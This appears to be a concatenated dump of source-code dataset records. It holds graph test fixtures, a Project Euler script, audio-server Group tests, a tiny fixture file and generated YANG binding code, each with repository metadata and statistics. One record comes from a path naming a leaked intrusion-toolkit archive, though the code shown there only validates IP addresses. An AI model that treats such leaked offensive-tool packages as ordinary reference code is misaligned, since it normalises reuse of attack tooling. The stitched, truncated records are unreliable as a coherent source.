frozenset([("i5", "v")]), "v"), ("source_var", ("i3", "i6"), frozenset([("i6", "u")]), "u"), ("sink_var", ("i3", "i6"), frozenset([("i6", "u")]), "u"), } }, ], } DRAGON_3 = { "tags": {"dragon", "bags", "multiple_labels"}, "nodes": [ "i1", "i2", "i3", "i4", "i5", "i6", "i7" ], "edges": [ ("i1", "i2"), ("i1", "i5"), ("i1", "i6"), ("i2", "i3"), ("i2", "i4"), ("i3", "i5"), ("i3", "i7"), ("i4", "i6"), ("i4", "i7"), ], "labels": { "i1": {"i5", "i6"}, "i2": {"i5", "i6", "i7"}, "i3": {"i5", "i7"}, "i4": {"i6", "i7"}, "i5": {"i5"}, "i6": {"i6"}, "i7": {"i7"}, }, "bags": { "i1": {frozenset(["i5", "i6"]): {("i1", "i2"), ("i1", "i5"), ("i1", "i6")}}, "i2": {frozenset(["i5", "i6", "i7"]): {("i2", "i3"), ("i2", "i4")}}, "i3": {frozenset(["i5"]): {("i3", "i5")}, frozenset(["i7"]): {("i3", "i7")}}, "i4": {frozenset(["i6"]): {("i4", "i6")}, frozenset(["i7"]): {("i4", "i7")}}, "i5": {frozenset(): set()}, "i6": {frozenset(): set()}, "i7": {frozenset(): set()}, }, } example_requests = OrderedDict([ ("simple path", SIMPLE_PATH), ("simple cycle 1", SIMPLE_CYCLE_1), ("simple cycle 2", SIMPLE_CYCLE_2), ("cycle with node before start 1", CYCLE_WITH_NODE_BEFORE_START_1), ("cycle with node before start 2", CYCLE_WITH_NODE_BEFORE_START_2), ("cycle with node after end", CYCLE_WITH_NODE_AFTER_END), ("cycle with nodes before and after", CYCLE_WITH_NODES_BEFORE_AND_AFTER), ("cycle with branch", CYCLE_WITH_BRANCH), ("two cycles connected with single edge", TWO_CYCLES_CONNECTED_WITH_SINGLE_EDGE), ("two cycles connected directly", TWO_CYCLES_CONNECTED_DIRECTLY), ("three cycles connected directly", THREE_CYCLES_CONNECTED_DIRECTLY), ("three cycles chained", THREE_CYCLES_CONNECTED_CHAINED), ("cycle on cycle 1", CYCLE_ON_CYCLE_1), ("cycle on cycle 2", CYCLE_ON_CYCLE_2), ("cycle on cycle 3", CYCLE_ON_CYCLE_3), ("cycle on cycle 4", CYCLE_ON_CYCLE_4), ("cycles crossing", CYCLES_CROSSING), ("three branches", THREE_BRANCHES), ("dragon 1", DRAGON_1), ("dragon 2", DRAGON_2), ("dragon 3", DRAGON_3) ])

55.732369

144

0.40586

18,770

154,100

3.041822

0.00911

0.153744

0.050337

0.096541

0.961608

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154,100

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false

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null

0

1

0

1

0

null

0

7

7a6f950358103d368b2c3dbfc16fbc1ce550843e

2,449

py

Python

Vault7/Lost-in-Translation/windows/Resources/Pc2.2/PyScripts/Lib/pc2_2/__init__.py

dendisuhubdy/grokmachine

120a21a25c2730ed356739231ec8b99fc0575c8b

[ "BSD-3-Clause" ]

46

2017-05-15T11:15:08.000Z

2018-07-02T03:32:52.000Z

Vault7/Lost-in-Translation/windows/Resources/Pc2.2/PyScripts/Lib/pc2_2/__init__.py

dendisuhubdy/grokmachine

120a21a25c2730ed356739231ec8b99fc0575c8b

[ "BSD-3-Clause" ]

null

Vault7/Lost-in-Translation/windows/Resources/Pc2.2/PyScripts/Lib/pc2_2/__init__.py

dendisuhubdy/grokmachine

120a21a25c2730ed356739231ec8b99fc0575c8b

[ "BSD-3-Clause" ]

24

2017-05-17T03:26:17.000Z

2018-07-09T07:00:50.000Z

# package pc2_2 import dsz import pc2_2.payload import re #-------------------------------------------------------------------------------------- def IsValidIpAddress(addr): # This is a rather inefficient way to find IPv6 addresses in particular... if ((re.match("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$", addr) != None) or (re.match("^([0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$", addr) != None) or (re.match("^::$", addr) != None) or (re.match("^::([a-fA-F0-9]){1,4}(:([a-f]|[A-F]|[0-9]){1,4}){0,6}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,5}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::([a-fA-F0-9]){1,4}:([a-fA-F0-9]){1,4}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,5}::([a-fA-F0-9]){1,4}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,6}::$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){5}:[0-9]{1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^::([0-9]){1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^::([a-fA-F0-9]){1,4}(:)([0-9]){1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}::([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}:[0-9]{1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,1}::([a-fA-F0-9]){1,4}(:[a-fA-F0-9]){0,2}:[0-9]{1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,2}::([a-fA-F0-9]){1,4}(:[a-fA-F0-9]){0,1}:[0-9]{1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,3}::([a-fA-F0-9]){1,4}:[0-9]{1,3}(\.[0-9]{1,3}){3}$", addr) != None) or (re.match("^([a-fA-F0-9]){1,4}(:([a-fA-F0-9]){1,4}){0,4}::[0-9]{1,3}(\.[0-9]{1,3}){3}$", addr) != None)): return True else: dsz.ui.Echo("Invalid IP address", dsz.ERROR) return False

64.447368

146

0.43283

573

2,449

1.846422

0.08377

0.126654

0.226843

0.272212

0.816635

0.804348

0.769376

0

0.148165

0.076766

2,449

37

147

66.189189

0.31977

0.070233

0

0.642857

0.636004

0.62632

0

1

0.035714

false

0

0.107143

0

0.214286

0

1

null

0

1

0

1

0

1

null

0

13

8fff121bda75cd999d987a43afeacd26fcb5193d

1,319

py

Python

Python/Project Euler/largest_product_in_series.py

ZacJoffe/competitive-programming

8150c9e12198500d8f57c6281f268d8027e7c318

[ "MIT" ]

null

Python/Project Euler/largest_product_in_series.py

ZacJoffe/competitive-programming

8150c9e12198500d8f57c6281f268d8027e7c318

[ "MIT" ]

null

Python/Project Euler/largest_product_in_series.py

ZacJoffe/competitive-programming

8150c9e12198500d8f57c6281f268d8027e7c318

[ "MIT" ]

null

numStr = "7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450" product = 1 largestProduct = 0 for i in range(0, 1000 - 13): print(i) for j in range(i, i + 13): product = product * int(numStr[j]) if product > largestProduct: largestProduct = product print(product) product = 1 print(largestProduct)

77.588235

1,012

0.890826

38

1,319

30.921053

0.421053

0.013617

0

0.839138

0.085671

1,319

16

1,013

82.4375

0.135158

0

0.166667

0

0.76746

0

1

0

1

0

false

0

0.25

0

1

null

0

1

0

1

0

1

0

1

null

1

0

7

856aeac7c7390c0e64e7c54186da8019504da96d

20,545

py

Python

tests/realtime/test_realtime_Group___setitem__.py

butayama/supriya

0c197324ecee4232381221880d1f40e109bb756c

[ "MIT" ]

null

tests/realtime/test_realtime_Group___setitem__.py

butayama/supriya

0c197324ecee4232381221880d1f40e109bb756c

[ "MIT" ]

null

tests/realtime/test_realtime_Group___setitem__.py

butayama/supriya

0c197324ecee4232381221880d1f40e109bb756c

[ "MIT" ]

null

import uqbar.strings import supriya.assets.synthdefs import supriya.realtime def test_01(server): group = supriya.realtime.Group().allocate() assert len(group) == 0 remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group """ ) synth = supriya.realtime.Synth(supriya.assets.synthdefs.test) assert synth.parent is None assert not synth.is_allocated group[:] = [synth] assert len(group) == 1 assert synth.parent is group assert synth in group assert synth.is_allocated remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test """ ) group[:] = [] assert len(group) == 0 assert synth.parent is None assert synth not in group assert not synth.is_allocated remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group """ ) def test_02(server): group = supriya.realtime.Group().allocate() synth_a = supriya.realtime.Synth(supriya.assets.synthdefs.test) synth_b = supriya.realtime.Synth(supriya.assets.synthdefs.test) group[:] = [synth_a, synth_b] assert len(group) == 2 assert synth_a.parent is group assert synth_b.parent is group assert synth_a in group assert synth_b in group assert synth_a.is_allocated assert synth_b.is_allocated assert synth_a is group[0] assert synth_b is group[1] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test 1002 test """ ) group[:] = [synth_b, synth_a] assert len(group) == 2 assert synth_a.parent is group assert synth_b.parent is group assert synth_a in group assert synth_b in group assert synth_a.is_allocated assert synth_b.is_allocated assert synth_a is group[1] assert synth_b is group[0] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1002 test 1001 test """ ) group[:] = [] assert len(group) == 0 assert synth_a.parent is None assert synth_b.parent is None assert synth_a not in group assert synth_b not in group assert not synth_a.is_allocated assert not synth_b.is_allocated remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group """ ) def test_03(server): group_a = supriya.realtime.Group() group_a.allocate() synth_a = supriya.realtime.Synth(supriya.assets.synthdefs.test) group_a.append(synth_a) group_b = supriya.realtime.Group() group_a.append(group_b) synth_b = supriya.realtime.Synth(supriya.assets.synthdefs.test) group_b.append(synth_b) synth_c = supriya.realtime.Synth(supriya.assets.synthdefs.test) group_b.append(synth_c) group_c = supriya.realtime.Group() group_b.append(group_c) synth_d = supriya.realtime.Synth(supriya.assets.synthdefs.test) group_a.append(synth_d) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test 1002 group 1003 test 1004 test 1005 group 1006 test """ ) assert len(group_a) == 3 assert len(group_b) == 3 assert len(group_c) == 0 assert synth_a.parent is group_a assert synth_b.parent is group_b assert synth_c.parent is group_b assert synth_d.parent is group_a assert group_b.parent is group_a assert group_c.parent is group_b assert synth_a is group_a[0] assert synth_b is group_b[0] assert synth_c is group_b[1] assert synth_d is group_a[2] assert group_b is group_a[1] assert group_c is group_b[2] del group_a[-1] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test 1002 group 1003 test 1004 test 1005 group """ ) assert len(group_a) == 2 assert len(group_b) == 3 assert len(group_c) == 0 assert synth_a.parent is group_a assert synth_b.parent is group_b assert synth_c.parent is group_b assert synth_d.parent is None assert group_b.parent is group_a assert group_c.parent is group_b assert synth_a is group_a[0] assert synth_b is group_b[0] assert synth_c is group_b[1] assert synth_d not in group_a assert group_b is group_a[1] assert group_c is group_b[2] del group_b[1] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test 1002 group 1003 test 1005 group """ ) assert len(group_a) == 2 assert len(group_b) == 2 assert len(group_c) == 0 assert synth_a.parent is group_a assert synth_b.parent is group_b assert synth_c.parent is None assert synth_d.parent is None assert group_b.parent is group_a assert group_c.parent is group_b assert synth_a is group_a[0] assert synth_b is group_b[0] assert synth_c not in group_b assert synth_d not in group_a assert group_b is group_a[1] assert group_c is group_b[1] del group_a[0] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1002 group 1003 test 1005 group """ ) assert len(group_a) == 1 assert len(group_b) == 2 assert len(group_c) == 0 assert synth_a.parent is None assert synth_b.parent is group_b assert synth_c.parent is None assert synth_d.parent is None assert group_b.parent is group_a assert group_c.parent is group_b assert synth_a not in group_a assert synth_b is group_b[0] assert synth_c not in group_b assert synth_d not in group_a assert group_b is group_a[0] assert group_c is group_b[1] del group_b[1] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1002 group 1003 test """ ) assert len(group_a) == 1 assert len(group_b) == 1 assert len(group_c) == 0 assert synth_a.parent is None assert synth_b.parent is group_b assert synth_c.parent is None assert synth_d.parent is None assert group_b.parent is group_a assert group_c.parent is None assert synth_a not in group_a assert synth_b is group_b[0] assert synth_c not in group_b assert synth_d not in group_a assert group_b is group_a[0] assert group_c not in group_b del group_a[0] remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group """ ) assert len(group_a) == 0 assert len(group_b) == 1 assert len(group_c) == 0 assert synth_a.parent is None assert synth_b.parent is group_b assert synth_c.parent is None assert synth_d.parent is None assert group_b.parent is None assert group_c.parent is None assert synth_a not in group_a assert synth_b is group_b[0] assert synth_c not in group_b assert synth_d not in group_a assert group_b not in group_a assert group_c not in group_b assert not synth_b.is_allocated def test_04(server): group_a = supriya.realtime.Group(name="Group A").allocate() group_b = supriya.realtime.Group(name="Group B").allocate() synth_a = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth A") synth_b = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth B") synth_c = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth C") synth_d = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth D") synth_e = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth E") synth_f = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth F") local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1000 group """ ) assert local_state == remote_state assert len(group_a) == 0 assert len(group_b) == 0 group_a[:] = [synth_a, synth_b] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1000 group 1002 test 1003 test """ ) assert local_state == remote_state assert len(group_a) == 2 assert len(group_b) == 0 group_a[:] = [synth_b, synth_a] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1000 group 1003 test 1002 test """ ) assert local_state == remote_state assert len(group_a) == 2 assert len(group_b) == 0 group_a[:] = [synth_c, synth_d, synth_b, synth_a] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1000 group 1004 test 1005 test 1003 test 1002 test """ ) assert local_state == remote_state assert len(group_a) == 4 assert len(group_b) == 0 group_b[1:-1] = [synth_c, synth_b] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1004 test 1003 test 1000 group 1005 test 1002 test """ ) assert local_state == remote_state assert len(group_a) == 2 assert len(group_b) == 2 group_b[1:-1] = [synth_b, synth_c, synth_e] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1003 test 1004 test 1006 test 1000 group 1005 test 1002 test """ ) assert local_state == remote_state assert len(group_a) == 2 assert len(group_b) == 3 group_a[:] = [synth_c, synth_f] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1003 test 1006 test 1000 group 1004 test 1007 test """ ) assert local_state == remote_state assert len(group_a) == 2 assert len(group_b) == 2 group_a[:-1] = [synth_f] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1003 test 1006 test 1000 group 1007 test """ ) assert local_state == remote_state assert len(group_a) == 1 assert len(group_b) == 2 group_b[len(group_b) :] = [group_a] local_state = str(server.query_local_nodes()) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1001 group 1003 test 1006 test 1000 group 1007 test """ ) assert local_state == remote_state assert len(group_a) == 1 assert len(group_b) == 3 def test_05(server): group_a = supriya.realtime.Group(name="Group A") synth_a = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth A") group_a.append(synth_a) group_b = supriya.realtime.Group(name="Group B") group_a.append(group_b) synth_b = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth B") group_b.append(synth_b) synth_c = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth C") group_b.append(synth_c) group_c = supriya.realtime.Group(name="Group C") group_b.append(group_c) synth_d = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth D") group_a.append(synth_d) synth_e = supriya.realtime.Synth(supriya.assets.synthdefs.test, name="Synth E") group_a.allocate() remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test 1002 group 1003 test 1004 test 1005 group 1006 test """ ) group_a_state = str(group_a) assert group_a_state == uqbar.strings.normalize( """ 1000 group (Group A) 1001 test (Synth A) amplitude: 1.0, frequency: 440.0 1002 group (Group B) 1003 test (Synth B) amplitude: 1.0, frequency: 440.0 1004 test (Synth C) amplitude: 1.0, frequency: 440.0 1005 group (Group C) 1006 test (Synth D) amplitude: 1.0, frequency: 440.0 """ ) assert group_a.node_id == 1000 assert synth_a.node_id == 1001 assert group_b.node_id == 1002 assert synth_b.node_id == 1003 assert synth_c.node_id == 1004 assert group_c.node_id == 1005 assert synth_d.node_id == 1006 assert synth_e.node_id is None synth_e.allocate(add_action=supriya.AddAction.REPLACE, target_node=group_a) remote_state = str(server.query_remote_nodes()) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1007 test """ ) assert group_a.node_id is None assert synth_a.node_id is None assert group_b.node_id is None assert synth_b.node_id is None assert synth_c.node_id is None assert group_c.node_id is None assert synth_d.node_id is None assert synth_e.node_id == 1007 group_a_state = str(group_a) assert group_a_state == uqbar.strings.normalize( """ ??? group (Group A) ??? test (Synth A) amplitude: 1.0, frequency: 440.0 ??? group (Group B) ??? test (Synth B) amplitude: 1.0, frequency: 440.0 ??? test (Synth C) amplitude: 1.0, frequency: 440.0 ??? group (Group C) ??? test (Synth D) amplitude: 1.0, frequency: 440.0 """ ) def test_06(server): group = supriya.realtime.Group() synth_a = supriya.realtime.Synth( name="Synth A", synthdef=supriya.assets.synthdefs.test ) synth_b = supriya.realtime.Synth( name="Synth B", synthdef=supriya.assets.synthdefs.test ) synth_b["amplitude"] = 0.5 synth_b["frequency"] = 443 audio_bus = supriya.realtime.Bus(0, "audio").allocate() control_bus = supriya.realtime.Bus(1, "control").allocate() synth_c = supriya.realtime.Synth( name="Synth C", synthdef=supriya.assets.synthdefs.test ) synth_c["amplitude"] = audio_bus synth_c["frequency"] = control_bus group[:] = [synth_a, synth_b, synth_c] group_state = str(group) assert group_state == uqbar.strings.normalize( """ ??? group ??? test (Synth A) amplitude: 1.0, frequency: 440.0 ??? test (Synth B) amplitude: 0.5, frequency: 443.0 ??? test (Synth C) amplitude: a0, frequency: c1 """ ) group.allocate() group_state = str(group) assert group_state == uqbar.strings.normalize( """ 1000 group 1001 test (Synth A) amplitude: 1.0, frequency: 440.0 1002 test (Synth B) amplitude: 0.5, frequency: 443.0 1003 test (Synth C) amplitude: a0, frequency: c1 """ ) remote_state = str(server.query_remote_nodes(True)) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test amplitude: 1.0, frequency: 440.0 1002 test amplitude: 0.5, frequency: 443.0 1003 test amplitude: a0, frequency: c1 """ ) synth_b["amplitude", "frequency"] = 0.75, 880 synth_c["amplitude", "frequency"] = control_bus, audio_bus remote_state = str(server.query_remote_nodes(True)) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1001 test amplitude: 1.0, frequency: 440.0 1002 test amplitude: 0.75, frequency: 880.0 1003 test amplitude: c1, frequency: a0 """ ) group[:] = [synth_c, synth_b, synth_a] remote_state = str(server.query_remote_nodes(True)) assert remote_state == uqbar.strings.normalize( """ NODE TREE 0 group 1 group 1000 group 1003 test amplitude: c1, frequency: a0 1002 test amplitude: 0.75, frequency: 880.0 1001 test amplitude: 1.0, frequency: 440.0 """ ) group.free() group_state = str(group) assert group_state == uqbar.strings.normalize( """ ??? group ??? test (Synth C) amplitude: c1, frequency: a0 ??? test (Synth B) amplitude: 0.75, frequency: 880.0 ??? test (Synth A) amplitude: 1.0, frequency: 440.0 """ )

27.726046

83

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0.030004

0.082944

0.052783

0.059695

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0.884919

0.834381

0.812118

0.795063

0.729084

0

0.057898

0.350158

20,545

740

84

27.763514

0.776496

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false

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0.024725

0

null

0

1

0

null

0

1

0

7

a4542a7d33020603b626a32ac66e0d77c151bc12

35

py

Python

packages/kite/spec/fixtures/small_sample.py

tpaclatee/atom-setup-python

0d4038b948e69b72a0beda2620c4ce559be9dde8

[ "MIT" ]

112

2016-12-09T15:39:52.000Z

2022-02-28T15:09:34.000Z

packages/kite/spec/fixtures/small_sample.py

tpaclatee/atom-setup-python

0d4038b948e69b72a0beda2620c4ce559be9dde8

[ "MIT" ]

475

2016-11-29T18:20:21.000Z

2021-05-12T22:21:11.000Z

packages/kite/spec/fixtures/small_sample.py

tpaclatee/atom-setup-python

0d4038b948e69b72a0beda2620c4ce559be9dde8

[ "MIT" ]

32

2016-11-23T17:56:54.000Z

2022-02-22T06:32:05.000Z

import os.path.join os.path.join()

11.666667

19

0.742857

7

35

3.714286

0.571429

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null

0

1

0

1

0

7

a45f0a95660ce0c0a8675802039dbc8a677e12b0

121,405

py

Python

gym/common/yang/vnf_pp.py

raphaelvrosa/gym

f1d20b444050ab0f445681ae39e93ffd44610f21

[ "Apache-2.0" ]

3

2020-03-13T20:18:22.000Z

2021-03-21T20:23:00.000Z

gym/common/yang/vnf_pp.py

raphaelvrosa/gym

f1d20b444050ab0f445681ae39e93ffd44610f21

[ "Apache-2.0" ]

null

gym/common/yang/vnf_pp.py

raphaelvrosa/gym

f1d20b444050ab0f445681ae39e93ffd44610f21

[ "Apache-2.0" ]

1

2020-12-02T18:06:47.000Z

# -*- coding: utf-8 -*- from operator import attrgetter from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType from pyangbind.lib.yangtypes import RestrictedClassType from pyangbind.lib.yangtypes import TypedListType from pyangbind.lib.yangtypes import YANGBool from pyangbind.lib.yangtypes import YANGListType from pyangbind.lib.yangtypes import YANGDynClass from pyangbind.lib.yangtypes import ReferenceType from pyangbind.lib.base import PybindBase from collections import OrderedDict from decimal import Decimal from bitarray import bitarray import six # PY3 support of some PY2 keywords (needs improved) if six.PY3: import builtins as __builtin__ long = int elif six.PY2: import __builtin__ class yc_origin_vnf_pp__reports_snapshots_origin(PybindBase): """ This class was auto-generated by the PythonClass plugin for PYANG from YANG module vnf-pp - based on the path /reports/snapshots/origin. Each member element of the container is represented as a class variable - with a specific YANG type. YANG Description: The detailed origin of the snapshot. """ __slots__ = ('_path_helper', '_extmethods', '__id','__role','__host',) _yang_name = 'origin' _pybind_generated_by = 'container' def __init__(self, *args, **kwargs): self._path_helper = kwargs.get("path_helper", False) extmethods = kwargs.pop("extmethods", None) if extmethods is False: self._extmethods = False elif extmethods is not None and isinstance(extmethods, dict): self._extmethods = extmethods elif hasattr(self, "_parent"): extmethods = getattr(self._parent, "_extmethods", None) self._extmethods = extmethods else: self._extmethods = False self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__role = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) self.__host = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="host", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) load = kwargs.pop("load", None) if args: if len(args) > 1: raise TypeError("cannot create a YANG container with >1 argument") all_attr = True for e in self._pyangbind_elements: if not hasattr(args[0], e): all_attr = False break if not all_attr: raise ValueError("Supplied object did not have the correct attributes") for e in self._pyangbind_elements: nobj = getattr(args[0], e) if nobj._changed() is False: continue setmethod = getattr(self, "_set_%s" % e) if load is None: setmethod(getattr(args[0], e)) else: setmethod(getattr(args[0], e), load=load) def _path(self): if hasattr(self, "_parent"): return self._parent._path()+[self._yang_name] else: return ['reports', 'snapshots', 'origin'] def _get_id(self): """ Getter method for id, mapped from YANG variable /reports/snapshots/origin/id (string) YANG Description: The unique identifier of the component of the origin of the snapshot, i.e., the agent or monitor unique identifier. """ return self.__id def _set_id(self, v, load=False): """ Setter method for id, mapped from YANG variable /reports/snapshots/origin/id (string) If this variable is read-only (config: false) in the source YANG file, then _set_id is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_id() directly. YANG Description: The unique identifier of the component of the origin of the snapshot, i.e., the agent or monitor unique identifier. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """id must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__id = t if hasattr(self, '_set'): self._set() def _unset_id(self): self.__id = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_role(self): """ Getter method for role, mapped from YANG variable /reports/snapshots/origin/role (string) YANG Description: The role of the component, origin of the snapshop, i.e., one of agent or monitor. """ return self.__role def _set_role(self, v, load=False): """ Setter method for role, mapped from YANG variable /reports/snapshots/origin/role (string) If this variable is read-only (config: false) in the source YANG file, then _set_role is considered as a private method. Backends looking to populate this variable should do so via calling thisObj._set_role() directly. YANG Description: The role of the component, origin of the snapshop, i.e., one of agent or monitor. """ if hasattr(v, "_utype"): v = v._utype(v) try: t = YANGDynClass(v,base=six.text_type, is_leaf=True, yang_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) except (TypeError, ValueError): raise ValueError({ 'error-string': """role must be of a type compatible with string""", 'defined-type': "string", 'generated-type': """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True)""", }) self.__role = t if hasattr(self, '_set'): self._set() def _unset_role(self): self.__role = YANGDynClass(base=six.text_type, is_leaf=True, yang_name="role", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='urn:ietf:params:xml:ns:yang:vnf-pp', defining_module='vnf-pp', yang_type='string', is_config=True) def _get_host(self): """ Getter method for host, mapped from YANG variable /reports/snapshots/origin/host (string) YANG Description: The hostname where the source of the snapshot was placed. """ return self.__host def _set_host(self, v, 